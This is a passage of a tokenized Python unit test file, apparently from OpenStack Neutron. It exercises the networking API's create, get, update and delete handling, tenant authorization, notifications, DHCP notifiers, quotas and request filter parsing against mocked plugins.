test_create_bulk_missing_attr ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_bulk_partial_body ( self ) : <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . _test_create_failure_bad_request ( '<STR_LIT>' , data ) <EOL> def test_create_attr_not_specified ( self ) : <EOL> net_id = _uuid ( ) <EOL> tenant_id = _uuid ( ) <EOL> device_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT:port>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : net_id , <EOL> '<STR_LIT>' : tenant_id , <EOL> '<STR_LIT>' : device_id , <EOL> '<STR_LIT>' : True } } <EOL> full_input = { '<STR_LIT:port>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : constants . ATTR_NOT_SPECIFIED , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> full_input [ '<STR_LIT:port>' ] . update ( initial_input [ '<STR_LIT:port>' ] ) <EOL> return_value = { '<STR_LIT:id>' : _uuid ( ) , '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : device_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> return_value . update ( initial_input [ '<STR_LIT:port>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { <EOL> '<STR_LIT>' : six . text_type ( tenant_id ) <EOL> } <EOL> instance . get_ports_count . return_value = <NUM_LIT:1> <EOL> instance . create_port . return_value = return_value <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( initial_input ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> instance . create_port . assert_called_with ( mock . ANY , port = full_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT:port>' , res ) <EOL> port = res [ '<STR_LIT:port>' ] <EOL> self . assertEqual ( net_id , port [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , port [ '<STR_LIT>' ] ) <EOL> def test_create_return_extra_attr ( self ) : <EOL> net_id = _uuid ( ) <EOL> data = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id , '<STR_LIT>' : "<STR_LIT>" } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> res = self . deserialize ( res ) <EOL> self . assertIn ( '<STR_LIT>' , res ) <EOL> net = res [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> self . assertNotIn ( '<STR_LIT>' , net ) <EOL> def test_fields ( self ) : <EOL> return_value = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : [ ] } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = return_value <EOL> self . api . get ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) ) <EOL> def _test_delete ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False } <EOL> instance . delete_network . return_value = None <EOL> res = self . api . delete ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> def test_delete_noauth ( self ) : <EOL> self . _test_delete ( None , _uuid ( ) , exc . HTTPNoContent . code ) <EOL> def test_delete_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_delete ( tenant_id , tenant_id , exc . HTTPNoContent . code ) <EOL> def test_delete_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_delete ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . code , expect_errors = True ) <EOL> def _test_get ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> shared = False <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> if req_tenant_id . endswith ( '<STR_LIT>' ) : <EOL> shared = True <EOL> env [ '<STR_LIT>' ] . roles = [ '<STR_LIT>' ] <EOL> data = { '<STR_LIT>' : real_tenant_id , '<STR_LIT>' : shared } <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = data <EOL> res = self . api . get ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> return res <EOL> def test_get_noauth ( self ) : <EOL> self . _test_get ( None , _uuid ( ) , <NUM_LIT:200> ) <EOL> def test_get_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> def test_get_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . code , expect_errors = True ) <EOL> def test_get_keystone_shared_network ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_get ( tenant_id + "<STR_LIT>" , tenant_id , <NUM_LIT:200> ) <EOL> def test_get_keystone_strip_admin_only_attribute ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> rules = oslo_policy . Rules . from_dict ( <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> policy . set_rules ( rules , overwrite = False ) <EOL> res = self . _test_get ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> res = self . deserialize ( res ) <EOL> self . assertNotIn ( '<STR_LIT:name>' , res [ '<STR_LIT>' ] ) <EOL> def _test_update ( self , req_tenant_id , real_tenant_id , expected_code , <EOL> expect_errors = False ) : <EOL> env = { } <EOL> if req_tenant_id : <EOL> env = { '<STR_LIT>' : context . Context ( '<STR_LIT>' , req_tenant_id ) } <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : True } } <EOL> return_value = { '<STR_LIT>' : [ ] } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . get_network . return_value = { '<STR_LIT>' : real_tenant_id , <EOL> '<STR_LIT>' : False } <EOL> instance . update_network . return_value = return_value <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , <EOL> id = uuidutils . generate_uuid ( ) , <EOL> fmt = self . fmt ) , <EOL> self . serialize ( data ) , <EOL> extra_environ = env , <EOL> expect_errors = expect_errors ) <EOL> self . assertEqual ( <NUM_LIT:1> , instance . get_network . call_count ) <EOL> self . assertIn ( '<STR_LIT:id>' , instance . get_network . call_args [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( res . status_int , expected_code ) <EOL> def test_update_noauth ( self ) : <EOL> self . _test_update ( None , _uuid ( ) , <NUM_LIT:200> ) <EOL> def test_update_keystone ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_update ( tenant_id , tenant_id , <NUM_LIT:200> ) <EOL> def test_update_keystone_bad_tenant ( self ) : <EOL> tenant_id = _uuid ( ) <EOL> self . _test_update ( tenant_id + "<STR_LIT>" , tenant_id , <EOL> exc . HTTPNotFound . code , expect_errors = True ) <EOL> def test_update_readonly_field ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT:status>' : "<STR_LIT>" } } <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> def test_invalid_attribute_field ( self ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" } } <EOL> res = self . api . put ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> self . serialize ( data ) , <EOL> content_type = '<STR_LIT>' + self . fmt , <EOL> expect_errors = True ) <EOL> self . assertEqual ( <NUM_LIT> , res . status_int ) <EOL> def test_retry_on_index ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . side_effect = [ db_exc . RetryRequest ( None ) , [ ] ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' , fmt = self . fmt ) ) <EOL> self . assertTrue ( instance . get_networks . called ) <EOL> def test_retry_on_show ( self ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_network . side_effect = [ db_exc . RetryRequest ( None ) , { } ] <EOL> api = webtest . TestApp ( router . APIRouter ( ) ) <EOL> api . get ( _get_path ( '<STR_LIT>' , _uuid ( ) , fmt = self . fmt ) ) <EOL> self . assertTrue ( instance . get_network . called ) <EOL> class SubresourceTest ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SubresourceTest , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . _instance = None <EOL> self . useFixture ( tools . AttributeMapMemento ( ) ) <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> api = router . APIRouter ( ) <EOL> SUB_RESOURCES = { } <EOL> RESOURCE_ATTRIBUTE_MAP = { } <EOL> SUB_RESOURCES [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> RESOURCE_ATTRIBUTE_MAP [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:foo>' : { '<STR_LIT>' : True , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : True } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { '<STR_LIT>' : None } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } <EOL> } <EOL> collection_name = SUB_RESOURCES [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> resource_name = '<STR_LIT>' <EOL> parent = SUB_RESOURCES [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> params = RESOURCE_ATTRIBUTE_MAP [ '<STR_LIT>' ] <EOL> member_actions = { '<STR_LIT>' : '<STR_LIT:GET>' } <EOL> _plugin = manager . NeutronManager . get_plugin ( ) <EOL> controller = v2_base . create_resource ( collection_name , resource_name , <EOL> _plugin , params , <EOL> member_actions = member_actions , <EOL> parent = parent , <EOL> allow_bulk = True , <EOL> allow_pagination = True , <EOL> allow_sorting = True ) <EOL> path_prefix = "<STR_LIT>" % ( parent [ '<STR_LIT>' ] , <EOL> parent [ '<STR_LIT>' ] , <EOL> collection_name ) <EOL> mapper_kwargs = dict ( controller = controller , <EOL> path_prefix = path_prefix ) <EOL> api . map . collection ( collection_name , resource_name , ** mapper_kwargs ) <EOL> api . map . resource ( collection_name , collection_name , <EOL> controller = controller , <EOL> parent_resource = parent , <EOL> member = member_actions ) <EOL> self . api = webtest . TestApp ( api ) <EOL> def tearDown ( self ) : <EOL> super ( SubresourceTest , self ) . tearDown ( ) <EOL> def test_index_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> self . api . get ( '<STR_LIT>' ) <EOL> instance . get_network_dummies . assert_called_once_with ( mock . ANY , <EOL> filters = mock . ANY , <EOL> fields = mock . ANY , <EOL> network_id = '<STR_LIT>' ) <EOL> def test_show_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . get ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) ) <EOL> instance . get_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> fields = mock . ANY ) <EOL> def test_create_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> body = { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT>' : _uuid ( ) } } <EOL> self . api . post_json ( '<STR_LIT>' , body ) <EOL> instance . create_network_dummy . assert_called_once_with ( mock . ANY , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_update_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } <EOL> self . api . put_json ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) , <EOL> body ) <EOL> instance . update_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_update_subresource_to_none ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> body = { '<STR_LIT>' : { } } <EOL> self . api . put_json ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) , <EOL> body ) <EOL> instance . update_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' , <EOL> dummy = body ) <EOL> def test_delete_sub_resource ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . delete ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id ) ) <EOL> instance . delete_network_dummy . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' ) <EOL> def test_sub_resource_member_actions ( self ) : <EOL> instance = self . plugin . return_value <EOL> dummy_id = _uuid ( ) <EOL> self . api . get ( '<STR_LIT>' + _get_path ( '<STR_LIT>' , id = dummy_id , <EOL> action = '<STR_LIT>' ) ) <EOL> instance . mactions . assert_called_once_with ( mock . ANY , <EOL> dummy_id , <EOL> network_id = '<STR_LIT>' ) <EOL> class V2Views ( base . BaseTestCase ) : <EOL> def _view ( self , keys , collection , resource ) : <EOL> data = dict ( ( key , '<STR_LIT:value>' ) for key in keys ) <EOL> data [ '<STR_LIT>' ] = '<STR_LIT:value>' <EOL> attr_info = attributes . RESOURCE_ATTRIBUTE_MAP [ collection ] <EOL> controller = v2_base . Controller ( None , collection , resource , attr_info ) <EOL> res = controller . _view ( context . get_admin_context ( ) , data ) <EOL> self . assertNotIn ( '<STR_LIT>' , res ) <EOL> for key in keys : <EOL> self . assertIn ( key , res ) <EOL> def test_network ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , <EOL> '<STR_LIT>' ) <EOL> self . _view ( keys , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_port ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' ) <EOL> self . _view ( keys , '<STR_LIT>' , '<STR_LIT:port>' ) <EOL> def test_subnet ( self ) : <EOL> keys = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _view ( keys , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class NotificationTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> super ( NotificationTest , self ) . setUp ( ) <EOL> fake_notifier . reset ( ) <EOL> def _resource_op_notifier ( self , opname , resource , expected_errors = False ) : <EOL> initial_input = { resource : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = initial_input <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> expected_code = exc . HTTPCreated . code <EOL> if opname == '<STR_LIT>' : <EOL> initial_input [ resource ] [ '<STR_LIT>' ] = _uuid ( ) <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , <EOL> initial_input , expect_errors = expected_errors ) <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . put_json ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> initial_input , expect_errors = expected_errors ) <EOL> expected_code = exc . HTTPOk . code <EOL> if opname == '<STR_LIT>' : <EOL> initial_input [ resource ] [ '<STR_LIT>' ] = _uuid ( ) <EOL> res = self . api . delete ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> expect_errors = expected_errors ) <EOL> expected_code = exc . HTTPNoContent . code <EOL> expected_events = ( '<STR_LIT:.>' . join ( [ resource , opname , "<STR_LIT:start>" ] ) , <EOL> '<STR_LIT:.>' . join ( [ resource , opname , "<STR_LIT:end>" ] ) ) <EOL> self . assertEqual ( len ( expected_events ) , <EOL> len ( fake_notifier . NOTIFICATIONS ) ) <EOL> for msg , event in zip ( fake_notifier . NOTIFICATIONS , expected_events ) : <EOL> self . assertEqual ( '<STR_LIT>' , msg [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( event , msg [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> def test_network_create_notifer ( self ) : <EOL> self . _resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_delete_notifer ( self ) : <EOL> self . _resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_update_notifer ( self ) : <EOL> self . _resource_op_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> class DHCPNotificationTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( DHCPNotificationTest , self ) . setUp ( ) <EOL> def _test_dhcp_notifier ( self , opname , resource , initial_input = None ) : <EOL> instance = self . plugin . return_value <EOL> instance . get_networks . return_value = initial_input <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> expected_code = exc . HTTPCreated . code <EOL> with mock . patch . object ( dhcp_rpc_agent_api . DhcpAgentNotifyAPI , <EOL> '<STR_LIT>' ) as dhcp_notifier : <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , <EOL> initial_input ) <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . put_json ( <EOL> _get_path ( '<STR_LIT>' , id = _uuid ( ) ) , <EOL> initial_input ) <EOL> expected_code = exc . HTTPOk . code <EOL> if opname == '<STR_LIT>' : <EOL> res = self . api . delete ( _get_path ( '<STR_LIT>' , id = _uuid ( ) ) ) <EOL> expected_code = exc . HTTPNoContent . code <EOL> expected_item = mock . call ( mock . ANY , mock . ANY , <EOL> resource + "<STR_LIT:.>" + opname + "<STR_LIT>" ) <EOL> if initial_input and resource not in initial_input : <EOL> resource += '<STR_LIT:s>' <EOL> num = len ( initial_input [ resource ] ) if initial_input and isinstance ( <EOL> initial_input [ resource ] , list ) else <NUM_LIT:1> <EOL> expected = [ expected_item for x in moves . range ( num ) ] <EOL> self . assertEqual ( expected , dhcp_notifier . call_args_list ) <EOL> self . assertEqual ( num , dhcp_notifier . call_count ) <EOL> self . assertEqual ( expected_code , res . status_int ) <EOL> def test_network_create_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> def test_network_delete_dhcp_notifer ( self ) : <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_network_update_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' } } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> def test_networks_create_bulk_dhcp_notifer ( self ) : <EOL> input = { '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : _uuid ( ) } ] } <EOL> self . _test_dhcp_notifier ( '<STR_LIT>' , '<STR_LIT>' , input ) <EOL> class QuotaTest ( APIv2TestBase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( QuotaTest , self ) . setUp ( ) <EOL> replacement_registry = resource_registry . ResourceRegistry ( ) <EOL> registry_patcher = mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> mock_registry = registry_patcher . start ( ) . return_value <EOL> mock_registry . get_resource = replacement_registry . get_resource <EOL> mock_registry . resources = replacement_registry . resources <EOL> replacement_registry . register_resource_by_name ( '<STR_LIT>' ) <EOL> def test_create_network_quota ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : [ ] } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:1> <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input , expect_errors = True ) <EOL> instance . get_networks_count . assert_called_with ( mock . ANY , <EOL> filters = mock . ANY ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> res . json [ '<STR_LIT>' ] [ '<STR_LIT:message>' ] ) <EOL> def test_create_network_quota_no_counts ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> full_input = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : [ ] } } <EOL> full_input [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . side_effect = ( <EOL> NotImplementedError ( ) ) <EOL> instance . get_networks . return_value = [ "<STR_LIT:foo>" ] <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input , expect_errors = True ) <EOL> instance . get_networks_count . assert_called_with ( mock . ANY , <EOL> filters = mock . ANY ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> res . json [ '<STR_LIT>' ] [ '<STR_LIT:message>' ] ) <EOL> def test_create_network_quota_without_limit ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , - <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) } } <EOL> instance = self . plugin . return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:3> <EOL> res = self . api . post_json ( <EOL> _get_path ( '<STR_LIT>' ) , initial_input ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> class ExtensionTestCase ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , False , group = '<STR_LIT>' ) <EOL> super ( ExtensionTestCase , self ) . setUp ( ) <EOL> plugin = '<STR_LIT>' <EOL> extensions . PluginAwareExtensionManager . _instance = None <EOL> self . useFixture ( tools . AttributeMapMemento ( ) ) <EOL> self . config_parse ( ) <EOL> self . setup_coreplugin ( plugin ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , EXTDIR ) <EOL> self . _plugin_patcher = mock . patch ( plugin , autospec = True ) <EOL> self . plugin = self . _plugin_patcher . start ( ) <EOL> manager . NeutronManager . get_plugin ( ) . supported_extension_aliases = ( <EOL> [ "<STR_LIT>" ] ) <EOL> api = router . APIRouter ( ) <EOL> self . api = webtest . TestApp ( api ) <EOL> quota . QUOTAS . _driver = None <EOL> cfg . CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' , <EOL> group = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> super ( ExtensionTestCase , self ) . tearDown ( ) <EOL> self . api = None <EOL> self . plugin = None <EOL> def test_extended_create ( self ) : <EOL> net_id = _uuid ( ) <EOL> initial_input = { '<STR_LIT>' : { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT>' : "<STR_LIT:abc>" } } <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : True , '<STR_LIT>' : False } } <EOL> data [ '<STR_LIT>' ] . update ( initial_input [ '<STR_LIT>' ] ) <EOL> return_value = { '<STR_LIT>' : [ ] , '<STR_LIT:status>' : "<STR_LIT>" , <EOL> '<STR_LIT:id>' : net_id , <EOL> '<STR_LIT>' : "<STR_LIT>" } <EOL> return_value . update ( data [ '<STR_LIT>' ] . copy ( ) ) <EOL> instance = self . plugin . return_value <EOL> instance . create_network . return_value = return_value <EOL> instance . get_networks_count . return_value = <NUM_LIT:0> <EOL> res = self . api . post_json ( _get_path ( '<STR_LIT>' ) , initial_input ) <EOL> instance . create_network . assert_called_with ( mock . ANY , <EOL> network = data ) <EOL> self . assertEqual ( exc . HTTPCreated . code , res . status_int ) <EOL> self . assertIn ( '<STR_LIT>' , res . json ) <EOL> net = res . json [ '<STR_LIT>' ] <EOL> self . assertEqual ( net_id , net [ '<STR_LIT:id>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT:status>' ] ) <EOL> self . assertEqual ( "<STR_LIT>" , net [ '<STR_LIT>' ] ) <EOL> self . assertNotIn ( '<STR_LIT>' , net ) <EOL> class TestSubresourcePlugin ( object ) : <EOL> def get_network_dummies ( self , context , network_id , <EOL> filters = None , fields = None ) : <EOL> return [ ] <EOL> def get_network_dummy ( self , context , id , network_id , <EOL> fields = None ) : <EOL> return { } <EOL> def create_network_dummy ( self , context , network_id , dummy ) : <EOL> return { } <EOL> def update_network_dummy ( self , context , id , network_id , dummy ) : <EOL> return { } <EOL> def delete_network_dummy ( self , context , id , network_id ) : <EOL> return <EOL> def mactions ( self , context , id , network_id ) : <EOL> return <EOL> class ListArgsTestCase ( base . BaseTestCase ) : <EOL> def test_list_args ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> expect_val = [ '<STR_LIT:2>' , '<STR_LIT:4>' ] <EOL> actual_val = api_common . list_args ( request , '<STR_LIT>' ) <EOL> self . assertEqual ( expect_val , sorted ( actual_val ) ) <EOL> def test_list_args_with_empty ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( [ ] , api_common . list_args ( request , '<STR_LIT>' ) ) <EOL> class FiltersTestCase ( base . BaseTestCase ) : <EOL> def test_all_skip_args ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( { } , api_common . get_filters ( request , None , <EOL> [ "<STR_LIT>" ] ) ) <EOL> def test_blank_values ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> self . assertEqual ( { } , api_common . get_filters ( request , { } ) ) <EOL> def test_no_attr_info ( self ) : <EOL> path = '<STR_LIT>' <EOL> request = webob . Request . blank ( path ) <EOL> expect_val = { '<STR_LIT:foo>' : [ '<STR_LIT:4>' ] , '<STR_LIT:bar>' : [ '<STR_LIT:3>' ] , '<STR_LIT>' : [ '<STR_LIT:2>' ] , '<STR_LIT>' : [ '<STR_LIT:1>' ] } <EOL> actual_val = api_common . get_filters ( request , { } ) <EOL> self . assertEqual ( 